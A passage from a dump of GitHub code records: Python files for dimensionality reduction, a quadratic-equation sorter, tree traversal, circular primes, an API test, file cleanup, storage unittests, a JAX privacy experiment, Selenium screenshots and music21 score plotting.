list((dis(i) for i in range(n)))\n return mat\n\n\n# extract shortest path from the results calculated by 'dijkstar'\ndef extract_shortest_path(predecessors, d):\n # costs of the edges on the shortest path from s to d\n costs = []\n try:\n u, e, cost = predecessors[d]\n while u is not None:\n costs.append(cost)\n u, e, cost = predecessors[u]\n costs.reverse()\n return sum(costs)\n except Exception:\n print('The graph is not connected')\n exit()\n\n\n# Eigen decompose\ndef isomap_eig(mat):\n n = mat.shape[0]\n # the squared proximity matrix\n mat2 = np.square(mat)\n # double centering\n c = np.eye(n) - 1 / n\n # calculate the dot-product matrix\n b = -0.5 * c.dot(mat2).dot(c)\n eigenvalues, eigenvectors = np.linalg.eig(b)\n return eigenvalues, eigenvectors\n\n\n# Calculate the lower-dimensional matrix\ndef isomap_w(eigenvalues, eigenvectors, k):\n eigenvalues_top_k_index = np.argsort(-eigenvalues)[0:k]\n # the k largest eigenvalues and eigenvectors\n eigenvalues_top_k = eigenvalues[eigenvalues_top_k_index]\n eigenvectors_top_k = eigenvectors[:, eigenvalues_top_k_index]\n w = eigenvectors_top_k.dot(np.diag(np.sqrt(eigenvalues_top_k)))\n return w.transpose()\n\n\n# Main method for testing ISOMAP\ndef isomap_main(train_mat, train_label, test_mat, test_label, ks):\n t1 = time.time()\n mat = dist_mat(train_mat, test_mat, isomap_k)\n eigenvalues, eigenvectors = isomap_eig(mat)\n for k in ks:\n w = isomap_w(eigenvalues, eigenvectors, k)\n train_n = train_mat.shape[1]\n test_n = test_mat.shape[1]\n train_mat_low = np.matrix(w[:, 0: train_n])\n test_mat_low = np.matrix(w[:, train_n: train_n + test_n])\n train_test(train_mat_low, train_label, test_mat_low, test_label, 1, k)\n print('cost: %f s\\n' % (time.time() - t1))\n\n\nif __name__ == '__main__':\n sonar_train_mat, sonar_train_label = read_data(sonar_train)\n sonar_test_mat, sonar_test_label = read_data(sonar_test)\n splice_train_mat, splice_train_label = read_data(splice_train)\n splice_test_mat, splice_test_label = read_data(splice_test)\n\n # min_k_connected(sonar_train_mat, sonar_test_mat)\n # min_k_connected(splice_train_mat, splice_test_mat)\n\n print('No reduction:')\n print('sonar:')\n train_test(sonar_train_mat, sonar_train_label, sonar_test_mat, sonar_test_label, 1, 0)\n print('splice:')\n train_test(splice_train_mat, splice_train_label, splice_test_mat, splice_test_label, 1, 0)\n\n 
print('\\nPCA:')\n print('sonar:')\n pca_main(sonar_train_mat, sonar_train_label, sonar_test_mat, sonar_test_label, (10, 20, 30))\n print('splice:')\n pca_main(splice_train_mat, splice_train_label, splice_test_mat, splice_test_label, (10, 20, 30))\n\n print('\\nSVD:')\n print('sonar:')\n svd_main(sonar_train_mat, sonar_train_label, sonar_test_mat, sonar_test_label, (10, 20, 30))\n print('splice:')\n svd_main(splice_train_mat, splice_train_label, splice_test_mat, splice_test_label, (10, 20, 30))\n\n print('\\nISOMAP:')\n print('sonar:')\n isomap_main(sonar_train_mat, sonar_train_label, sonar_test_mat, sonar_test_label, (10, 20, 30))\n print('splice:')\n isomap_main(splice_train_mat, splice_train_label, splice_test_mat, splice_test_label, (10, 20, 30))\n\n","repo_name":"sunzequn/Assignments_NJU","sub_path":"DM/Assignment_02/reduction.py","file_name":"reduction.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34024771928","text":"from QuadraticEquation import QuadraticEquation\nequations = []\n\n# f = open(\"input01.txt\")\nwith open(\"input01.txt\") as f:\n for line in f:\n try:\n a, b, c = [float(el) for el in line.split()]\n equations.append(QuadraticEquation(a, b, c))\n except ValueError:\n break\n\nequations_no_solutions = [] # have no solutions;\nequations_one_solutions = [] # have one solution;\nequations_two_solutions = [] # have two solutions;\nequations_inf_solutions = [] # have infinitely many solutions.\n\nfor eq in equations:\n sol_num = eq.solutions_number()\n if sol_num == 0:\n equations_no_solutions.append(eq)\n elif sol_num == 1:\n equations_one_solutions.append(eq)\n elif sol_num == 2:\n equations_two_solutions.append(eq)\n else:\n equations_inf_solutions.append(eq)\n\nprint(\"Equations with no solutions:\")\nfor e in equations_no_solutions:\n e.show()\nprint(\"Equations with one solution:\")\nfor e in equations_one_solutions:\n e.show()\nprint(\"Equations with two solutions:\")\nfor e in equations_two_solutions:\n e.show()\nprint(\"Equations with infinitely many solutions:\")\nfor e in equations_inf_solutions:\n e.show()\n\neq_with_min_solution = equations_one_solutions[0]\nmin_solution = eq_with_min_solution.solve()[0]\nfor eq in equations_one_solutions:\n x = eq.solve()[0]\n # print(x)\n if min_solution > x:\n eq_with_min_solution = eq\n min_solution = x\n\nprint(\"++++++++++++++++++++++++++++++++\")\nprint(\"++++++++++++++++++++++++++++++++\")\neq_with_min_solution.show()\nprint(min_solution)\n","repo_name":"krenevych/Prog2021","sub_path":"Mat22/O01/t01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11001304202","text":"'''\r\nGiven a binary tree, return the zigzag level order traversal of its nodes' values. (That is, traverse the first level from left to right, the next level from right to left, and so on, alternating between levels.)\r\n\r\nFor example:\r\nGiven the binary tree [3,9,20,null,null,15,7],\r\n\r\n 3\r\n / \\\r\n 9 20\r\n / \\\r\n 15 7\r\nreturn its zigzag level order traversal as:\r\n\r\n[\r\n [3],\r\n [20,9],\r\n [15,7]\r\n]\r\n\r\nSource: LeetCode\r\nLink: https://leetcode-cn.com/problems/binary-tree-zigzag-level-order-traversal\r\nCopyright belongs to LeetCode. For commercial reprints please contact the official site for authorization; for non-commercial reprints please cite the source.\r\n'''\r\nfrom collections import deque\r\n\r\n# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nclass Solution:\r\n def zigzagLevelOrder(self, root: TreeNode):\r\n result = []\r\n if not root:\r\n return result\r\n # BFS with a deque; reverse the collected values on every other level\r\n queue = deque([root])\r\n left_to_right = True\r\n while queue:\r\n level = []\r\n for _ in range(len(queue)):\r\n node = queue.popleft()\r\n level.append(node.val)\r\n if node.left:\r\n queue.append(node.left)\r\n if node.right:\r\n queue.append(node.right)\r\n if not left_to_right:\r\n level.reverse()\r\n result.append(level)\r\n left_to_right = not left_to_right\r\n return result\r\n","repo_name":"dunkle/leetcode_block","sub_path":"树问题/103. 二叉树的锯齿形层序遍历.py","file_name":"103. 二叉树的锯齿形层序遍历.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2839454058","text":"from prime_stuff import primes\nimport itertools\nimport timeit\n\nstart = timeit.default_timer()\n\n# ---------------------------------------------- #\nprime_set = set(n for n in primes(1000000))\ncircular_primes = 0\n\ndef check_circles(n):\n\t# check that every rotation of n's digits is also prime\n\ts = str(n)\n\tfor i in range(1, len(s)):\n\t\trotation = s[i:] + s[:i]\n\t\tif int(rotation) not in prime_set:\n\t\t\treturn False\n\treturn True\n\nfor n in prime_set:\n\tif check_circles(n):\n\t\tcircular_primes += 1\n\nprint(circular_primes)\n# ---------------------------------------------- #\n\nend = timeit.default_timer()\nprint('---> took', round(end - start, 3), 'seconds')","repo_name":"ysshah/project-euler","sub_path":"prob35.py","file_name":"prob35.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23614065742","text":"#!/usr/bin/python\n# coding=utf-8\nimport requests\nimport unittest\nimport json,time,random\nfrom common.public import *\nfrom mysqlHandle.common_mysql import *\n\nclass ICEM_Interface(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n self.headers = headers\n self.host = host\n self.path = \"/api/icem-sms/activity/template/get\"\n # self.random = random.randint(1000,99999)\n self.sql_id = \"SELECT id FROM t_workflow_node_define WHERE node_name = '发短信' ORDER BY id DESC LIMIT 1;\"\n self.sql_activityId = \"SELECT activity_id FROM t_workflow_node_define WHERE node_name = '发短信' ORDER BY id DESC LIMIT 1;\"\n self.dbname = \"geek_icem_activity\"\n print(\"---------- starting tests ----------\")\n\n\n # get the SMS template endpoint\n def test_smsTemplateGet(self):\n '''get the SMS template endpoint'''\n self.url = self.host + self.path\n self.node_id = DB_ICEM_proc(self.dbname).get_vslues(self.sql_id)\n self.activity_id = DB_ICEM_proc(self.dbname).get_vslues(self.sql_activityId)\n # print(self.nodeDefineId)\n data = {\"id\":self.node_id,\"activityId\":self.activity_id,\"activityType\":\"INTELLIGENCE_MARKET\"}\n print(self.url)\n response = requests.post(url=self.url,data= json.dumps(data), headers=self.headers)\n print(response.text)\n assert response.json()['error'] == 0\n\n\n def tearDown(self):\n pass\n\nif __name__ == \"__main__\":\n sms = ICEM_Interface()","repo_name":"EmmySmith/autoInterfaceTest","sub_path":"test_interface/CEM/marketingManagement/marketingManagement/smsTemplateGet_test.py","file_name":"smsTemplateGet_test.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30990863669","text":"from datetime import datetime\nimport hashlib\nimport os\nimport glob\nimport logging\nimport shutil\nfrom app.config import (\n VIDEO_FILE_PATH, \n VIDEO_EXTRACT_PATH,\n 
VIDEO_KEEP_RECENT_DAYS)\nlogger = logging.getLogger('uvicorn')\n\n\ndef md5_id():\n    str2hash = str(datetime.now().timestamp())\n    return hashlib.md5(str2hash.encode()).hexdigest()\n\n\ndef remove_file(keep_recent_days=VIDEO_KEEP_RECENT_DAYS):\n    video_glob = os.path.join(VIDEO_FILE_PATH, '*.mp4')\n    video_extract_glob = os.path.join(VIDEO_EXTRACT_PATH, '*')\n\n    videofiles = glob.glob(video_glob)\n    video_extract_files = glob.glob(video_extract_glob)\n\n    if len(videofiles) == 0 and len(video_extract_files) == 0:\n        logger.info(\"No file or folder to remove\")\n\n    for f in videofiles:\n        modify_time = os.path.getmtime(f)\n        modify_time = datetime.fromtimestamp(int(modify_time))\n        if (datetime.now() - modify_time).days >= keep_recent_days:\n            os.remove(f)\n            logger.info(f\"Removing file {f}\")\n\n    for folder in video_extract_files:\n        modify_time = os.path.getmtime(folder)\n        modify_time = datetime.fromtimestamp(int(modify_time))\n        if (datetime.now() - modify_time).days >= keep_recent_days:\n            shutil.rmtree(folder)\n            logger.info(f\"Removing folder {folder}\")","repo_name":"Kira1108/AbnormalDetectApp","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"31126501541","text":"#!/usr/bin/python3\n\"\"\"FileStorage class unittests file\"\"\"\nimport os\nimport unittest\nimport models\nfrom models.engine.file_storage import FileStorage\nfrom models.base_model import BaseModel\n\n\nclass TestFileStorageModel(unittest.TestCase):\n    \"\"\"FileStorage class unittests\"\"\"\n    def test_is_an_instance(self):\n        \"\"\"check that fs1 is an instance of FileStorage\"\"\"\n        fs1 = FileStorage()\n        self.assertIsInstance(fs1, FileStorage)\n\n    def test_insert_attr(self):\n        \"\"\"reset the class attributes used by the test suite\"\"\"\n        FileStorage._FileStorage__file_path = 'file.json'\n        FileStorage._FileStorage__objects = {}\n\n    def test_file_path(self):\n        \"\"\"tests that the file path attribute exists\"\"\"\n        self.assertTrue(hasattr(FileStorage, '_FileStorage__file_path'))\n\n    def test_file_obj(self):\n        \"\"\"test that the objects attribute exists\"\"\"\n        self.assertTrue(hasattr(FileStorage, '_FileStorage__objects'))\n\n    def test_file_path_value(self):\n        \"\"\"test that the file path has the expected value\"\"\"\n        self.assertEqual(FileStorage._FileStorage__file_path, 'file.json')\n\n    def test_objects_value(self):\n        \"\"\"test that the objects dict starts empty\"\"\"\n        self.assertEqual(FileStorage._FileStorage__objects, {})\n\n    def test_file_path_type(self):\n        \"\"\"test that the file path is a string\"\"\"\n        self.assertTrue(isinstance(FileStorage._FileStorage__file_path, str))\n\n    def test_objects_type(self):\n        \"\"\"test that the returned objects is a dictionary\"\"\"\n        self.assertTrue(isinstance(FileStorage._FileStorage__objects, dict))\n\n    def test_all(self):\n        \"\"\"testing all()\"\"\"\n        fs2 = FileStorage()\n        FileStorage._FileStorage__objects = {'k': 'j'}\n        self.assertEqual(FileStorage._FileStorage__objects, fs2.all())\n\n    def test_new(self):\n        \"\"\"testing new()\"\"\"\n        bm1 = BaseModel()\n        cn = bm1.__class__.__name__\n        k = cn + '.' + str(bm1.id)\n        s = FileStorage()\n        s.new(bm1)\n        self.assertIn(k, FileStorage._FileStorage__objects)\n\n    def test_save(self):\n        \"\"\"testing save()\"\"\"\n        bm1 = BaseModel()\n        cn = bm1.__class__.__name__\n        k = cn + '.' 
+ str(bm1.id)\n        s = FileStorage()\n        s.new(bm1)\n        s.save()\n        with open('file.json') as file:\n            self.assertTrue(isinstance(file.read(), str))\n\n    def test_save2(self):\n        \"\"\"testing save() part 2\"\"\"\n        bm1 = BaseModel()\n        cn = bm1.__class__.__name__\n        k = cn + '.' + str(bm1.id)\n        s = FileStorage()\n        s.new(bm1)\n        s.save()\n        with open('file.json') as file:\n            self.assertIn(k, file.read())\n\n    def test_reload(self):\n        \"\"\"testing that save() creates file.json\"\"\"\n        bm1 = BaseModel()\n        cn = bm1.__class__.__name__\n        k = cn + '.' + str(bm1.id)\n        s = FileStorage()\n        s.new(bm1)\n        s.save()\n        self.assertTrue(os.path.exists('file.json'))\n\n    def test_reload2(self):\n        \"\"\"testing reload() part 2\"\"\"\n        FileStorage._FileStorage__objects = {}\n        bm1 = BaseModel()\n        cn = bm1.__class__.__name__\n        k = cn + '.' + str(bm1.id)\n        s = FileStorage()\n        s.new(bm1)\n        s.save()\n        s.reload()\n        self.assertIn(k, FileStorage._FileStorage__objects)\n\n    def test_permissions_file(self):\n        \"\"\"Test File test_file_storage.py permissions\"\"\"\n\n        test_file = os.access(\"models/engine/file_storage.py\", os.R_OK)\n        self.assertTrue(test_file, \"Read permissions\")\n        test_file = os.access(\"models/engine/file_storage.py\", os.W_OK)\n        self.assertTrue(test_file, \"Write permissions\")\n        test_file = os.access(\"models/engine/file_storage.py\", os.X_OK)\n        self.assertTrue(test_file, \"Execute permissions\")\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"kaelwebdev/AirBnB_clone","sub_path":"tests/test_models/test_engine/test_file_storage.py","file_name":"test_file_storage.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"26526184495","text":"import collections\nfrom typing import Iterable, Iterator\n\nimport chex\nimport haiku as hk\nimport jax\nfrom jax_privacy.experiments import image_data as data\nfrom jax_privacy.experiments.image_classification import config_base\nfrom jax_privacy.experiments.image_classification import forward\nfrom jax_privacy.experiments.image_classification import models\nfrom jax_privacy.src.training import experiment\nfrom jax_privacy.src.training import metrics as metrics_module\n\n\nclass Experiment(experiment.AbstractExperiment):\n  \"\"\"Jaxline experiment.\n\n  This class controls the training and evaluation loop at a high-level.\n  \"\"\"\n\n  def __init__(\n      self,\n      mode: str,\n      init_rng: chex.PRNGKey,\n      config: config_base.ExperimentConfig,\n  ):\n    \"\"\"Initializes experiment.\n\n    Args:\n      mode: 'train' or 'eval'.\n      init_rng: random number generation key for initialization.\n      config: ConfigDict holding all hyper-parameters of the experiment.\n    \"\"\"\n    # Unused, since we rely on `config.random_seed` instead. 
The argument\n # `init_rng` is kept to conform to jaxline's expectation.\n del init_rng\n\n self.config = config\n\n self._forward_fn = forward.MultiClassForwardFn(\n net=hk.transform_with_state(self._model_fn))\n\n super().__init__(\n mode=mode,\n random_seed=self.config.random_seed,\n training_config=self.config.training,\n optimizer_config=self.config.optimizer,\n averaging_config=self.config.averaging,\n num_training_samples=self.config.data_train.config.num_samples,\n num_updates=self.config.num_updates,\n )\n\n @property\n def forward_fn(self) -> forward.MultiClassForwardFn:\n return self._forward_fn\n\n def _model_fn(self, inputs, is_training=False):\n model_kwargs = {\n 'num_classes': self.config.data_train.config.num_classes,\n **self.config.model.kwargs,\n }\n model_instance = models.get_model_instance(self.config.model.name,\n model_kwargs)\n return model_instance(\n inputs,\n is_training=is_training,\n )\n\n def _should_restore_model(self) -> bool:\n return bool(self.config.model.restore.path)\n\n def _restore_model(self):\n self._params, self._network_state = models.restore_from_path(\n restore_path=self.config.model.restore.path,\n params_key=self.config.model.restore.params_key,\n network_state_key=self.config.model.restore.network_state_key,\n layer_to_reset=self.config.model.restore.layer_to_reset,\n params_init=self._params,\n network_state_init=self._network_state,\n )\n\n def _build_train_input(self) -> Iterator[data.DataInputs]:\n \"\"\"Builds the training input pipeline.\"\"\"\n return self.config.data_train.load_dataset(\n batch_dims=(\n jax.local_device_count(),\n self.batching.batch_size_per_device_per_step,\n ),\n is_training=True,\n shard_data=True,\n )\n\n def _build_eval_input(self) -> Iterator[data.DataInputs]:\n \"\"\"Builds the evaluation input pipeline.\"\"\"\n return self.config.data_eval.load_dataset(\n batch_dims=(\n jax.process_count(),\n jax.local_device_count(),\n self.config.evaluation.batch_size,\n ),\n is_training=False,\n shard_data=False,\n max_num_batches=self.config.evaluation.max_num_batches,\n )\n\n def _eval_epoch(self, rng, unused_global_step):\n \"\"\"Evaluates an epoch.\"\"\"\n avg_metrics = collections.defaultdict(metrics_module.Avg)\n\n # Checkpoints broadcast for each local device, which we undo here since the\n # evaluation is performed on a single device (it is not pmapped).\n if isinstance(self._averaging_config.ema_coefficient, Iterable):\n ema_params = {\n f'ema_{ema_decay}': params_ema for ema_decay, params_ema in zip(\n self._averaging_config.ema_coefficient,\n self._params_ema,\n strict=True)\n }\n else:\n ema_params = {'ema': self._params_ema}\n params_dict = {\n 'last': self._params,\n **ema_params,\n 'polyak': self._params_polyak,\n }\n\n state = self._network_state\n num_samples = 0\n host_id = jax.process_index()\n\n # Iterate over the evaluation dataset and accumulate the metrics.\n for inputs in self._build_eval_input():\n rng, rng_eval = jax.random.split(rng)\n num_hosts, num_devices_per_host, batch_size_per_device, *_ = (\n inputs.image.shape)\n batch_size = num_hosts * num_devices_per_host * batch_size_per_device\n num_samples += batch_size\n local_inputs = jax.tree_map(lambda x: x[host_id], inputs)\n\n # Evaluate batch for each set of parameters.\n for params_name, params in params_dict.items():\n metrics = self.updater.evaluate(params, state, rng_eval, local_inputs)\n\n # Update accumulated average for each metric.\n for metric_name, val in metrics.scalars.items():\n 
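# batch-size-weighted running average for each (metric, parameter-set) pair\n          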
avg_metrics[f'{metric_name}_{params_name}'].update(val, n=batch_size)\n\n metrics = {k: v.avg for k, v in avg_metrics.items()}\n metrics['num_samples'] = num_samples\n\n return metrics\n","repo_name":"deepmind/jax_privacy","sub_path":"jax_privacy/experiments/image_classification/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"18"} +{"seq_id":"18213818113","text":"# # wait until we see a skill\n# login_button = wait.until(\n# EC.presence_of_element_located((By.XPATH, \"//a[contains(text(), 'I ALREADY HAVE AN ACCOUNT')]\"))\n# )\n\n# # click the login button (it says \"I ALREADY HAVE AN ACCOUNT\")\n# login_button.click()\n\nfrom Screenshot import Screenshot\nfrom selenium import webdriver\n\nwith webdriver.Firefox() as driver: \n driver.get(\"https://www.skyscanner.com/transport/flights-from/ista/?adultsv2=1&cabinclass=economy&childrenv2=&ref=home&rtn=1&preferdirects=false&outboundaltsenabled=false&inboundaltsenabled=false&oym=2307&iym=2307&qp_prevScreen=HOMEPAGE\")\n driver.maximize_window()\n driver.implicitly_wait(15)\n ob = Screenshot.Screenshot()\n\n img_url = ob.full_screenshot(driver, save_path=r'.', image_name='myimage.png', is_load_at_runtime=True,\n load_wait_time=3)\n print(img_url)\n","repo_name":"Splintdewolfcry/IntroductionToSelenium","sub_path":"ScrapingLearnerScripts/couldbeuseful.py","file_name":"couldbeuseful.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23534315390","text":"import librosa\nfrom colorsys import rgb_to_hsv, hsv_to_rgb\nimport music21 as mu\nfrom midi2audio import FluidSynth\nimport pandas as pd\nimport numpy as np\nimport sympy as sp\nfrom IPython.display import HTML, IFrame\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nfrom matplotlib.patches import Rectangle\nfrom IPython.display import Image\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Patch\n\n\n\ndef create_sound_file_from_midi(m21_data, file_name):\n m21_data.write('midi', fp = file_name + \".mid\")\n fs = FluidSynth()\n fs.midi_to_audio('./' + file_name + \".mid\", file_name + '.mp3')\n return(IPython.display.Audio(\"./\" + file_name + \".mp3\"))\n\n\n\ndef complementary(r, g, b):\n hsv = rgb_to_hsv(r, g, b)\n return hsv_to_rgb((hsv[0] + 0.5) % 1, hsv[1], hsv[2])\n\n\ndef createMatPlotLibAxisForScore(ax, x_limit, y_limit): \n ax.set_xticks(range(int(x_limit)))\n ax.set_yticks(range(int(y_limit)))\n [ax.xaxis.get_major_ticks()[i].tick1line.set_color(\"white\") for i in range(int(x_limit))]\n [ax.yaxis.get_major_ticks()[i].tick1line.set_color(\"white\") for i in range(int(y_limit))]\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.grid(color='k', linestyle='-', linewidth=.5)\n ax.tick_params(axis = \"both\", which = \"both\", bottom = False, top = False)\n \n return(ax)\n\n\ndef createScoreFormatting(ax1, yOffset):\n \n # formatting data\n text_kwargs = dict( fontsize=32, color='white')\n \n keyColorCoords = [((0, 1), 80, 1), ((0, 3), 80, 1), ((0, 6), 80, 1), ((0, 8), 80, 1), ((0, 10), 80, 1), \n ((0, 13), 80, 1),((0, 15), 80, 1),((0, 18), 80, 1),((0, 20), 80, 1),((0, 22), 80, 1),\n ((0, 25), 80, 1), ((0, 27), 80, 1), ((0, 30), 80, 1), ((0, 32), 80, 1), ((0, 34), 80, 1),\n ((0, 37), 80, 1), ((0, 39), 80, 1), ((0, 42), 80, 1), ((0, 44), 80, 1), ((0, 46), 80, 1),\n ((0, 49), 80, 1), ((0, 51), 80, 1), ((0, 54), 80, 1), 
((0, 56), 80, 1), ((0, 58), 80, 1),\n ((0, 61), 80, 1), ((0, 63), 80, 1), ((0, 66), 80, 1), ((0, 68), 80, 1), ((0, 70), 80, 1),\n ((0, 73), 80, 1), ((0, 75), 80, 1), ((0, 78), 80, 1), ((0, 80), 80, 1), ((0, 82), 80, 1),\n ((0, 85), 80, 1), ((0, 87), 80, 1), ((0, 90), 80, 1), ((0, 92), 80, 1), ((0, 94), 80, 1),\n ((0, 97), 80, 1), ((0, 99), 80, 1), ((0, 102), 80, 1), ((0, 104), 80, 1), ((0, 106), 80, 1),\n ((0, 109), 80, 1), ((0, 111), 80, 1), ((5, 114), 80, 1), ((0, 116), 80, 1), ((0, 118), 80, 1)]\n\n\n \n # Draw black and white keys\n [ax1.add_patch(Rectangle((keyColorCoords[i][0][0],keyColorCoords[i][0][1] - yOffset), keyColorCoords[i][1], keyColorCoords[i][2], color=\"#EBECF0\", zorder = -10)) for i in range(len(keyColorCoords))]\n\n ax1.add_patch(Rectangle((74, 0), 10, 80, color = \"black\"))\n \n\n return(ax1)\n\n\ndef convertDataForScoreVisualisation(scoreDataAsDF, startMeasure, endMeasure):\n\n df1 = scoreDataAsDF[(scoreDataAsDF.measureNumber >= startMeasure) & (scoreDataAsDF.measureNumber <= endMeasure) & (scoreDataAsDF.midiNumber != -1)]\n\n offsetForStart = min(df1.offsetAsFloat)\n minMidiNumber = min(df1.midiNumber)\n maxMidiNumber = max(df1.midiNumber)\n \n df2 = df1[[\"instrument\", \"part\",\"measureNumber\", \"offsetAsFloat\", \"midiNumber\", \"nameWithOctave\", \"quarterLengthDurationAsFloat\", \"partColor\"]].copy().reset_index()\n\n df2['height'] = 1\n heightNormalize = df2.groupby(by=[\"offsetAsFloat\", \"midiNumber\"]).sum().reset_index()[['offsetAsFloat', 'midiNumber', 'height']]\n new_df = pd.merge(df2, heightNormalize, how='left', left_on=['offsetAsFloat','midiNumber'], right_on = ['offsetAsFloat','midiNumber'])\n df = new_df.sort_values(by = [ \"offsetAsFloat\", \"midiNumber\"]).reset_index()\n df[\"divider\"] = df.groupby((df[\"height_y\"]!=df[\"height_y\"].shift()).cumsum()).cumcount() + 1\n df['divider'] = np.where(df.height_y == 1,1, df.divider)\n df['width'] = df.height_x / df.height_y\n \n \n df['adjustedHeightOffset'] = ((df.height_x / df.height_y) * df.divider) - df.width\n \n df['new_col'] = list(zip(df[\"offsetAsFloat\"]-offsetForStart, (df[\"midiNumber\"] - minMidiNumber) + df['adjustedHeightOffset'] ))\n df['col2'] = list(zip(df[\"new_col\"], df[\"quarterLengthDurationAsFloat\"], df[\"width\"], df[\"partColor\"], df['nameWithOctave']))\n \n\n coords = df.col2.values\n\n return([coords, minMidiNumber, maxMidiNumber, df])\n\n\n\ndef visualizeScore(scoreData, fromMeasure = None, toMeasure = None, reduce = False):\n \n coords1 = convertDataForScoreVisualisation(scoreData, fromMeasure, toMeasure)\n\n text_kwargs = dict( fontsize=10, color='orange')\n\n legend_elements = [Line2D([0], [0], color='b', lw=4, label='Violin'),\n Line2D([0], [0], marker='o', color='w', label='Viola',\n markerfacecolor='g', markersize=15),\n Patch(facecolor='orange', edgecolor='r',\n label='Cello')]\n\n\n\n # DRAW NOTES\n fig, (ax1) = plt.subplots(1, 1, figsize=(20, 12))\n\n ax1 = createMatPlotLibAxisForScore(ax1, 16, (coords1[2] - coords1[1]) + 5)\n\n t = [ax1.add_patch(Rectangle(coords1[0][i][0], coords1[0][i][1], coords1[0][i][2], color = coords1[0][i][3])) for i in range(len(coords1[0]))]\n\n u = [ax1.text(coords1[0][j][0][0], coords1[0][j][0][1], coords1[0][j][4], **text_kwargs) for j in range(len(coords1[0]))]\n\n\n ax1.legend(handles=legend_elements, loc='upper right')\n\n f1 = createScoreFormatting(ax1, coords1[1])\n\n# THIS FUNCTION ASSUMES THAT YOU HAVE PARSED YOUR MUSICXML FILE USING THE COVERTER.PARSE MUSIC21 FUNCTION. 
\n# ONCE YOU HAVE CREATED PARSED TO A MUSIC21 OBJECT, JUST PASS THAT OBJECT INTO THIS FUNCTION\ndef convertScoreToDF(scoreData = None, scoreName = None, scoreMovement = None):\n # examine the list of parts\n partList = scoreData.getElementsByClass(mu.stream.Part)\n pList = []\n for i in range(0, len(partList)):\n pList.append(partList[i])\n \n \n events = []\n\n currentNumerator = None\n currentDenominator = None\n currentInstrument = None\n currentInstrumentName = None\n currentPartName = None\n\n\n for eachPart in pList:\n\n\n for el in eachPart.flatten():\n # note that there are all kinds of that you get hold of when iterating through this object - some of these are below (such as pitchname, midi number etc, but by looking at the music21Object you can see all the other info is available) \n eventDictionary = {}\n eventDictionary['offset'] = el.offset\n eventDictionary['quarterLengthDuration'] = el.duration.quarterLength\n eventDictionary['measureNumber'] = el.measureNumber\n eventDictionary['currentNumerator'] = currentNumerator\n eventDictionary['currentDenominator'] = currentDenominator\n eventDictionary['instrument'] = currentInstrumentName\n eventDictionary['part'] = currentPartName\n\n\n currentType = str(type(el))\n\n if currentType == \"\":\n\n currentNumerator = el.numerator\n currentDenominator = el.denominator\n\n if \"instrument\" in currentType:\n\n currentInstrumentName = el.instrumentName\n currentPartName = el.partName\n\n if currentType == \"\":\n #print(\"REST\")\n eventDictionary['nameWithOctave'] = \"NA\"\n eventDictionary['midiNumber'] = -1\n eventDictionary['fullName'] = \"Rest\"\n eventDictionary['name'] = \"NA\"\n eventDictionary['octave'] = \"NA\"\n events.append(eventDictionary)\n\n\n if currentType == \"\":\n eventDictionary['nameWithOctave'] = el.nameWithOctave\n eventDictionary['midiNumber'] = el.pitches[0].midi\n eventDictionary['fullName'] = el.pitches[0].fullName\n eventDictionary['name'] = el.pitches[0].name\n eventDictionary['octave'] = el.pitches[0].octave\n events.append(eventDictionary)\n\n elif currentType == \"\":\n \n\n for eachNote in el:\n \n tempEventDictionary = eventDictionary.copy()\n\n tempEventDictionary['nameWithOctave'] = eachNote.nameWithOctave\n tempEventDictionary['midiNumber'] = eachNote.pitches[0].midi\n tempEventDictionary['fullName'] = eachNote.pitches[0].fullName\n tempEventDictionary['name'] = eachNote.pitches[0].name\n tempEventDictionary['octave'] = eachNote.pitches[0].octave\n events.append(tempEventDictionary)\n \n \n scoreEventData = pd.DataFrame(events)\n scoreEventData['offsetAsFloat'] = scoreEventData['offset'].astype(float)\n scoreEventData['quarterLengthDurationAsFloat'] = scoreEventData.quarterLengthDuration.astype(float)\n cmap = plt.get_cmap('viridis')\n colors = cmap(np.linspace(0, 1, len(scoreEventData.part)))\n scoreEventData['partColor'] = colors.tolist()\n scoreEventData['scoreName'] = scoreName\n scoreEventData['movement'] = scoreMovement\n \n return(scoreEventData)\n\n\n\n## Beginnings of code for midi conversion\nfrom midiutil import MIDIFile\n\ndegrees = [60, 62, 64, 65, 67, 69, 71, 72] # MIDI note number\ntrack = 0\nchannel = 0\ntime = 0 # In beats\nduration = 1 # In beats\ntempo = 60 # In BPM\nvolume = 100 # 0-127, as per the MIDI standard\n\nMyMIDI = MIDIFile(1) # One track, defaults to format 1 (tempo track\n # automatically created)\nMyMIDI.addTempo(track,time, tempo)\n\nfor pitch in degrees:\n MyMIDI.addNote(track, channel, pitch, time, duration, volume)\n time = time + 1\n\nwith 
